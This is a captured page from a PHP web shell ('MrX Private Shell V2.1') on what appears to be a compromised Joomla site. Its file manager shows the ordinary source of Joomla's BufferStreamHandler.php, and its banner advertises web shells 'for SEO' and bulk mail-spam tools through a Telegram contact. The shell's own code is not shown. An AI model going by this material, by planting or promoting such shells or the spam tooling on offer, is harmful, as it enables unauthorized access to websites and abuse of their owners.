__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Joomla! Content Management System
 *
 * @copyright  (C) 2007 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 *
 * Remove phpcs exception with deprecated autoloading BufferStreamHandler::stream_register();
 * @phpcs:disable PSR1.Files.SideEffects
 */

namespace Joomla\CMS\Utility;

\defined('JPATH_PLATFORM') or die;

/**
 * @deprecated  3.8 will be removed in 5.0
 *              Workaround for B/C. (removal missed in 4.0, also remove phpcs exception).
 *              If BufferStreamHandler is needed directly call BufferStreamHandler::stream_register();
 */
BufferStreamHandler::stream_register();

/**
 * Generic Buffer stream handler
 *
 * This class provides a generic buffer stream.  It can be used to store/retrieve/manipulate
 * string buffers with the standard PHP filesystem I/O methods.
 *
 * @since  1.7.0
 */
class BufferStreamHandler
{
    /**
     * Stream position
     *
     * @var    integer
     * @since  1.7.0
     */
    public $position = 0;

    /**
     * Buffer name
     *
     * @var    string
     * @since  1.7.0
     */
    public $name = null;

    /**
     * Buffer hash
     *
     * @var    array
     * @since  3.0.0
     */
    public $buffers = [];

    /**
     * Status of registering the wrapper
     *
     * @var    boolean
     * @since  3.8.2
     */
    private static $registered = false;

    /**
     * Function to register the stream wrapper
     *
     * @return  void
     *
     * @since  3.8.2
     */
    public static function stream_register()
    {
        if (!self::$registered) {
            stream_wrapper_register('buffer', '\\Joomla\\CMS\\Utility\\BufferStreamHandler');

            self::$registered = true;
        }
    }

    /**
     * Function to open file or url
     *
     * @param   string   $path         The URL that was passed
     * @param   string   $mode         Mode used to open the file @see fopen
     * @param   integer  $options      Flags used by the API, may be STREAM_USE_PATH and
     *                                 STREAM_REPORT_ERRORS
     * @param   string   &$openedPath  Full path of the resource. Used with STREAM_USE_PATH option
     *
     * @return  boolean
     *
     * @since   1.7.0
     * @see     streamWrapper::stream_open
     */
    public function stream_open($path, $mode, $options, &$openedPath)
    {
        $url                        = parse_url($path);
        $this->name                 = $url['host'];
        $this->buffers[$this->name] = null;
        $this->position             = 0;

        return true;
    }

    /**
     * Read stream
     *
     * @param   integer  $count  How many bytes of data from the current position should be returned.
     *
     * @return  mixed    The data from the stream up to the specified number of bytes (all data if
     *                   the total number of bytes in the stream is less than $count. Null if
     *                   the stream is empty.
     *
     * @see     streamWrapper::stream_read
     * @since   1.7.0
     */
    public function stream_read($count)
    {
        $ret = substr($this->buffers[$this->name], $this->position, $count);
        $this->position += \strlen($ret);

        return $ret;
    }

    /**
     * Write stream
     *
     * @param   string  $data  The data to write to the stream.
     *
     * @return  integer
     *
     * @see     streamWrapper::stream_write
     * @since   1.7.0
     */
    public function stream_write($data)
    {
        $left                       = substr($this->buffers[$this->name], 0, $this->position);
        $right                      = substr($this->buffers[$this->name], $this->position + \strlen($data));
        $this->buffers[$this->name] = $left . $data . $right;
        $this->position += \strlen($data);

        return \strlen($data);
    }

    /**
     * Function to get the current position of the stream
     *
     * @return  integer
     *
     * @see     streamWrapper::stream_tell
     * @since   1.7.0
     */
    public function stream_tell()
    {
        return $this->position;
    }

    /**
     * Function to test for end of file pointer
     *
     * @return  boolean  True if the pointer is at the end of the stream
     *
     * @see     streamWrapper::stream_eof
     * @since   1.7.0
     */
    public function stream_eof()
    {
        return $this->position >= \strlen($this->buffers[$this->name]);
    }

    /**
     * The read write position updates in response to $offset and $whence
     *
     * @param   integer  $offset  The offset in bytes
     * @param   integer  $whence  Position the offset is added to
     *                            Options are SEEK_SET, SEEK_CUR, and SEEK_END
     *
     * @return  boolean  True if updated
     *
     * @see     streamWrapper::stream_seek
     * @since   1.7.0
     */
    public function stream_seek($offset, $whence)
    {
        switch ($whence) {
            case SEEK_SET:
                return $this->seek_set($offset);

            case SEEK_CUR:
                return $this->seek_cur($offset);

            case SEEK_END:
                return $this->seek_end($offset);
        }

        return false;
    }

    /**
     * Set the position to the offset
     *
     * @param   integer  $offset  The offset in bytes
     *
     * @return  boolean
     */
    protected function seek_set($offset)
    {
        if ($offset < 0 || $offset > \strlen($this->buffers[$this->name])) {
            return false;
        }

        $this->position = $offset;

        return true;
    }

    /**
     * Adds the offset to current position
     *
     * @param   integer  $offset  The offset in bytes
     *
     * @return  boolean
     */
    protected function seek_cur($offset)
    {
        if ($offset < 0) {
            return false;
        }

        $this->position += $offset;

        return true;
    }

    /**
     * Sets the position to the end of the current buffer + offset
     *
     * @param   integer  $offset  The offset in bytes
     *
     * @return  boolean
     */
    protected function seek_end($offset)
    {
        $offset += \strlen($this->buffers[$this->name]);

        if ($offset < 0) {
            return false;
        }

        $this->position = $offset;

        return true;
    }
}

Filemanager

Name Type Size Permission Actions
BufferStreamHandler.php File 6.21 KB 0664
Utility.php File 2.2 KB 0664
Filemanager